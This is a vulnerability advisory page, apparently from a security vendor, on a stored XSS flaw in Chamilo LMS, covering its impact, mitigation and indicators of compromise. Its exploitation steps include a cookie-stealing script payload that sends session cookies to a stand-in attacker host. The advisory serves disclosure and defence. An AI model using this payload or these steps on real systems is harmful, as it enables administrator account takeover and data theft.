CVE-2025-55208: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-55208 is a Stored Cross-Site Scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.32, arising from insecure file uploads in the Social Networks feature. A low-privilege authenticated user can upload a malicious file that, when viewed by an administrator in their inbox, executes arbitrary JavaScript in the admin's browser context — enabling full account takeover. The vulnerability was published on March 5, 2026, and is fixed in version 1.11.34. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically in the file upload handling within Chamilo's Social Networks module. The platform fails to adequately validate or sanitize uploaded file content before rendering it in the admin inbox, allowing an attacker to embed malicious JavaScript payloads within uploaded files. Exploitation requires the attacker to have a low-privilege account on the LMS and relies on an administrator viewing the malicious content in their inbox (user interaction required). The attack vector is network-based with low complexity, and the scope is changed — meaning the injected script executes in the context of the victim's (admin's) browser session rather than the attacker's (GitHub Advisory).

Impact

Successful exploitation enables full administrator account takeover via session hijacking, as the malicious JavaScript executes within the admin's authenticated browser session. This grants the attacker all privileges of the compromised admin account, including access to student records, system configuration, and all sensitive data within the LMS. Additionally, the payload can perform unauthorized actions on behalf of the admin, exfiltrate sensitive data, and potentially self-propagate to other users, severely compromising the confidentiality, integrity, and availability of the entire LMS environment (GitHub Advisory).

Exploitability

As of the time of publication, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Red Hat CVE). The EPSS score is approximately 0.047%, indicating a currently low probability of exploitation in the near term. No threat actor attribution or CISA KEV catalog listing has been identified for this vulnerability. However, the low attack complexity and the high-impact outcome (admin takeover) make it an attractive target if exploitation details become public.

Exploitation steps

  1. Reconnaissance: Identify a Chamilo LMS instance running version 1.11.32 or earlier. Confirm the Social Networks feature is enabled and accessible to low-privilege users.
  2. Account Registration/Access: Obtain or register a low-privilege user account on the target Chamilo LMS instance.
  3. Craft Malicious File: Prepare a file (e.g., an HTML or SVG file) containing an embedded JavaScript payload designed to steal the admin's session cookie or perform actions on their behalf — for example: <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>.
  4. Upload via Social Networks: Navigate to the Social Networks feature and upload the crafted malicious file, leveraging the platform's insufficient file upload validation.
  5. Trigger Admin Interaction: Send a message or share content containing the uploaded file to the administrator's inbox, or otherwise cause the admin to view the malicious content.
  6. Payload Execution: When the administrator opens their inbox and views the content, the embedded JavaScript executes in their browser within the LMS session context.
  7. Account Takeover: Use the exfiltrated session token or directly perform privileged actions (e.g., create new admin accounts, access student data) via the hijacked admin session (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the LMS server or admin browser to unexpected external domains shortly after an admin views their inbox; unusual GET/POST requests to attacker-controlled URLs containing encoded cookie or session data.
  • File System: Presence of uploaded files with unexpected extensions or content types (e.g., .html, .svg, .xml) in the Social Networks upload directory containing JavaScript tags or event handlers.
  • Logs: Web server access logs showing file uploads by low-privilege users to Social Networks endpoints followed shortly by admin inbox access; JavaScript errors or unexpected redirects logged in browser console logs on admin sessions.
  • Application: Unexpected new administrator accounts created without authorization; unauthorized changes to LMS configuration or user roles; admin session tokens appearing in external server logs.

Mitigation and workarounds

The primary remediation is to upgrade Chamilo LMS to version 1.11.34 or later, which contains the official fix for this vulnerability (GitHub Advisory). Until patching is feasible, organizations should restrict file upload capabilities within the Social Networks feature and limit access to trusted users only. Additionally, implementing strict server-side file type validation, content-type enforcement, and output encoding for all user-supplied content — particularly in file upload mechanisms — can reduce exposure. Monitoring admin inbox activity for suspicious or unexpected file uploads is also recommended as a compensating control.

Community reactions

The vulnerability was reported by security researcher dishant550 and disclosed via GitHub Security Advisories on March 5, 2026 (GitHub Advisory). Coverage appeared on The Hacker Wire and was shared on Mastodon, with brief community discussion noting the high severity and admin takeover potential. No major vendor statements beyond the Chamilo advisory or significant analyst commentary have been identified at this time.

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management